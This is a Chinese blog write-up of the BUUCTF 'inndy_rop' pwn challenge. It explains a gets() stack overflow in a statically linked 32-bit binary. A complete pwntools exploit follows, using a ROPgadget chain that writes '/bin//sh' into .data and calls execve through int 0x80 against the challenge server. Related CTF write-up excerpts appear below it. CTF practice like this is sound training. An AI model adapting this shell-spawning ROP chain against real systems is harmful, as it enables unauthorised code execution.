BUUCTF Pwn inndy_rop WP

最新推荐文章于 2025-05-16 11:14:39 发布
最新推荐文章于 2025-05-16 11:14:39 发布
阅读量190 收藏
点赞数 1
分类专栏: BUUCTF Pwn 文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33348179/article/details/146176635
版权

checksec exeinfo

IDA32 查看函数

左边一堆函数 似乎是静态链接 右边有个gets的栈溢出漏洞

因为是静态链接用不了ret2libc 溢出长度也很长 试试ROPgadget构造的ropchain:

成功拿到

exp:

from pwn import *
from struct import pack

#io = process('./rop')
io = remote("node5.buuoj.cn", 27921)
p = b''

p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

io.sendline(b'a' * (0xC + 4) + p)
io.interactive()

flag:

BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 411
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3318
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
[BUUCTF-pwn]——inndy_rop
Y_peak的博客
03-18 403
[BUUCTF-pwn]——inndy_rop main函数无法反汇编,不过还好,里面的overflow就是gets函数,可以栈溢出。 因为懒得自己去构造rop链了,看看里面是否可以拼凑出系统的调用 里面有就省的我们自己写了 中间还找了半天错,我真是个笨蛋,以前一直用p 忘记和和构造系统调用的变量重复了,改为a就好了 exploit from pwn import * from struct import pack a = remote('node3.buuoj.cn',27139) # Padding
BUUCTF pwn——inndy_rop
CNS-Enterprise BCC-1701-J
05-16 311
BUUCTF 做题练习
[BUUCTF]PWN——inndy_rop
mcmuyanga的博客
11-26 1625
inndy_rop 附件 步骤: 例行检查,32位,开启了nx保护 本地调试运行没看出个啥,直接上ida,一开始f5会报错, 找到报错提示的位置,点击option–>general调出如图的界面,勾选上stack pointar 看到堆栈不平衡,选中报错地址的上一行,右击,点击“change stack"跳出如图界面,在sp值前加个”–“即可 然后就能f5反编译了,main里就一个overflow函数,存在溢出漏洞 右边的函数列表里只有静态编译的结果,所以这题没法去泄露libc什么的 这
[BUUCTF]inndy_rop 杂谈、32位与64位系统调用、与思考
Tokameine的博客
09-07 646
总之先从题目开始看吧,是一道非常简单但却让我长见识的题...... int overflow() { char v1[12]; // [esp+Ch] [ebp-Ch] BYREF return gets(v1); } 明显的栈溢出,且程序基本没有特别的保护,正常构造rop链即可拿到shell 主要是想拓展一下系统调用与一个简单的获取ROP方法 ROPgadget --binary rop --ropchain ROP chain...
BUUCTF--pwn--inndy_rop【ret2syscall】
qq_73149934的博客
12-24 370
BUUCTF--pwn--inndy_rop
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2624
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
buuctf pwn others_shellcode
02-25
### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1106
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
buuctf pwninndy_rop)(cmcc_simplerop)([ZJCTF 2019]Login)
cainiao78777的博客
04-18 334
由于buuctf好多pwn题目都是一个类型的,所以就把不同的,学到东西的题目,记录一下。
buuctf-pwn-inndy_rop-wp
xuaohu123的博客
01-08 382
buuctf-pwn-innd_rop 查看文件保护 32位程序,开启了nx保护。
[BJDCTF 2nd]secret&&inndy_rop
、moddemod
07-20 536
[BJDCTF 2nd]secret exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './secret' p = process(proc_name) # p = remote('node3.buuoj.cn', 28831)
buuctf pwn wp(第八波)学会利用ROPgadget
月阴荒的博客
04-22 1829
inndy_rop 简单利用ROPgadget https://www.cnblogs.com/bhxdn/p/12347296.html
BUU刷题 ROPgadget直接拼凑,off by one,overlapping,fastbin attack uaf system参数截断 data段覆盖指针
carol2358的博客
06-27 797
考完了,我活了。 这题ida里看着特别复杂,但其实就一个gets 静态编译: ida看起来特复杂,就是静态编译的结果。静态编译就不会调用libc中的东西,所以我们也不存在泄露版本利用libc的函数了。 https://www.cnblogs.com/bhxdn/p/12347296.html 直接 ROPgadget --binary rop --ropchain from pwn import * from struct import pack #r = process('./inndy_rop
WEB安全--Java安全--shiro550反序列化漏洞
最新发布
m0_74800552的博客
05-16 297
shiro550反序列化
安全巡检清单
yh
05-15 879
软件状态巡检应深入到系统内核层面。漏洞扫描是软件状态巡检的重要组成部分,需要定期对网络设备、主机、数据库、应用系统等进行全面的漏洞扫描,利用专业的扫描工具发现已知和未知的安全漏洞。通过严格执行本清单所列的各项检查内容,并结合企业自身的业务特点和安全需求进行适当调整和补充,可以有效地提升信息系统的整体安全水平,降低安全风险,为企业的稳健发展提供坚实保障。通过周期性的状态检查、安全扫描、日志分析和补丁管理,可以及时发现并修复潜在的安全隐患和漏洞,确保网络设备、服务器、操作系统及应用系统的高可用性和安全性。
安全版4.5.8开启审计后,hac+读写分离主备切换异常
HighGO
05-16 223
异常:hac集群一主两备环境,开启hgproxy和审计功能后,进行集群主备切换操作。切换过程持续近5分钟,主库方可切换到备节点上,其中未参与切换(原主与新主外的备节点)的备库无法拉起,持续restarting状态很长时间后start failed。解决此问题的安装包:hgdb-see-4.5.8-6954d9f.aarch64.rpm。BUG安装包: hgdb-see-4.5.8-db43858.aarch64.rpm。1、临时解决方案:关闭审计功能,修改审计参数后需要重启集群。系统平台:UOS (飞腾)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值